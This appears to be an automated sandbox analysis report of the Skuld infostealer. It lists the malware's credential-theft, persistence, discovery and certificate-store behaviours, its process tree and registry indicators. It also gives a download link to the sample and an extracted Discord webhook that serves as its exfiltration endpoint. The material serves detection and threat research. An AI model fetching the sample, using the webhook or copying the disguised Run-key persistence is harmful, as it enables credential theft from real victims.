skuld | hxxps://mega[.]nz/file/NHMH0JIC#MWgYGlJ1WF6rv0Stb_jLp5qFVZ5QmvQ24WRasDbAwe4

Analysis

max time kernel
67s
max time network
72s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
29-08-2024 16:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://mega.nz/file/NHMH0JIC#MWgYGlJ1WF6rv0Stb_jLp5qFVZ5QmvQ24WRasDbAwe4

Score

10^/10

skuld credential_access defense_evasion discovery execution persistence spyware stealer

Malware Config

Extracted

Family

skuld

https://ptb.discord.com/api/webhooks/1277694857338687561/FxXidvF_Xcdm1mFBnfMwjGWhByymrClV-px0CZhfTr9YtQWuA8etVIU6_PpLcbsJWD9d

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3996	powershell.exe
5492	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
5324	slinky.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	slinky.exe

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
96	api.ipify.org
97	api.ipify.org
98	ip-api.com

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	slinky.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0	slinky.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 1 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3016	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5508	wmic.exe
5656	wmic.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	99	Go-http-client/1.1

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2718105630-359604950-2820636825-1000_Classes\Local Settings	msedge.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	slinky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	slinky.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	slinky.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
3844	msedge.exe
3844	msedge.exe
4856	msedge.exe
4856	msedge.exe
960	identity_helper.exe
960	identity_helper.exe
2392	msedge.exe
2392	msedge.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5492	powershell.exe
5492	powershell.exe
5324	slinky.exe
5324	slinky.exe
5492	powershell.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
5324	slinky.exe
3996	powershell.exe
3996	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: 33	2540	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2540	AUDIODG.EXE
Token: SeRestorePrivilege	6004	7zG.exe
Token: 35	6004	7zG.exe
Token: SeSecurityPrivilege	6004	7zG.exe
Token: SeSecurityPrivilege	6004	7zG.exe
Token: SeDebugPrivilege	5324	slinky.exe
Token: SeIncreaseQuotaPrivilege	5244	wmic.exe
Token: SeSecurityPrivilege	5244	wmic.exe
Token: SeTakeOwnershipPrivilege	5244	wmic.exe
Token: SeLoadDriverPrivilege	5244	wmic.exe
Token: SeSystemProfilePrivilege	5244	wmic.exe
Token: SeSystemtimePrivilege	5244	wmic.exe
Token: SeProfSingleProcessPrivilege	5244	wmic.exe
Token: SeIncBasePriorityPrivilege	5244	wmic.exe
Token: SeCreatePagefilePrivilege	5244	wmic.exe
Token: SeBackupPrivilege	5244	wmic.exe
Token: SeRestorePrivilege	5244	wmic.exe
Token: SeShutdownPrivilege	5244	wmic.exe
Token: SeDebugPrivilege	5244	wmic.exe
Token: SeSystemEnvironmentPrivilege	5244	wmic.exe
Token: SeRemoteShutdownPrivilege	5244	wmic.exe
Token: SeUndockPrivilege	5244	wmic.exe
Token: SeManageVolumePrivilege	5244	wmic.exe
Token: 33	5244	wmic.exe
Token: 34	5244	wmic.exe
Token: 35	5244	wmic.exe
Token: 36	5244	wmic.exe
Token: SeIncreaseQuotaPrivilege	5244	wmic.exe
Token: SeSecurityPrivilege	5244	wmic.exe
Token: SeTakeOwnershipPrivilege	5244	wmic.exe
Token: SeLoadDriverPrivilege	5244	wmic.exe
Token: SeSystemProfilePrivilege	5244	wmic.exe
Token: SeSystemtimePrivilege	5244	wmic.exe
Token: SeProfSingleProcessPrivilege	5244	wmic.exe
Token: SeIncBasePriorityPrivilege	5244	wmic.exe
Token: SeCreatePagefilePrivilege	5244	wmic.exe
Token: SeBackupPrivilege	5244	wmic.exe
Token: SeRestorePrivilege	5244	wmic.exe
Token: SeShutdownPrivilege	5244	wmic.exe
Token: SeDebugPrivilege	5244	wmic.exe
Token: SeSystemEnvironmentPrivilege	5244	wmic.exe
Token: SeRemoteShutdownPrivilege	5244	wmic.exe
Token: SeUndockPrivilege	5244	wmic.exe
Token: SeManageVolumePrivilege	5244	wmic.exe
Token: 33	5244	wmic.exe
Token: 34	5244	wmic.exe
Token: 35	5244	wmic.exe
Token: 36	5244	wmic.exe
Token: SeIncreaseQuotaPrivilege	5508	wmic.exe
Token: SeSecurityPrivilege	5508	wmic.exe
Token: SeTakeOwnershipPrivilege	5508	wmic.exe
Token: SeLoadDriverPrivilege	5508	wmic.exe
Token: SeSystemProfilePrivilege	5508	wmic.exe
Token: SeSystemtimePrivilege	5508	wmic.exe
Token: SeProfSingleProcessPrivilege	5508	wmic.exe
Token: SeIncBasePriorityPrivilege	5508	wmic.exe
Token: SeCreatePagefilePrivilege	5508	wmic.exe
Token: SeBackupPrivilege	5508	wmic.exe
Token: SeRestorePrivilege	5508	wmic.exe
Token: SeShutdownPrivilege	5508	wmic.exe
Token: SeDebugPrivilege	5508	wmic.exe
Token: SeSystemEnvironmentPrivilege	5508	wmic.exe
Token: SeRemoteShutdownPrivilege	5508	wmic.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
6004	7zG.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe
4856	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4856 wrote to memory of 2912	4856	msedge.exe	85
PID 4856 wrote to memory of 2912	4856	msedge.exe	85
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3508	4856	msedge.exe	86
PID 4856 wrote to memory of 3844	4856	msedge.exe	87
PID 4856 wrote to memory of 3844	4856	msedge.exe	87
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88
PID 4856 wrote to memory of 3888	4856	msedge.exe	88

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
4872	attrib.exe
5420	attrib.exe
2388	attrib.exe
6028	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://mega.nz/file/NHMH0JIC#MWgYGlJ1WF6rv0Stb_jLp5qFVZ5QmvQ24WRasDbAwe4
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4856
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcdd6546f8,0x7ffcdd654708,0x7ffcdd654718
  2⤵
  PID:2912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2
  2⤵
  PID:3508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
  2⤵
  PID:3888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
  2⤵
  PID:928
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
  2⤵
  PID:2884
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5224 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
  2⤵
  PID:4992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3500 /prefetch:1
  2⤵
  PID:2876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3448 /prefetch:1
  2⤵
  PID:2548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2692 /prefetch:8
  2⤵
  PID:1472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3152 /prefetch:8
  2⤵
  PID:1052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5672 /prefetch:1
  2⤵
  PID:676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2064,8601178328857321877,10800409729825889783,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5280 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2392

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4844

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1160

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x410
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2540

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1436

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\slinky\" -ad -an -ai#7zMap27940:74:7zEvent20741
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:6004

C:\Users\Admin\Downloads\slinky\slinky\slinky.exe
"C:\Users\Admin\Downloads\slinky\slinky\slinky.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
- Maps connected drives based on registry
- Modifies system certificate store
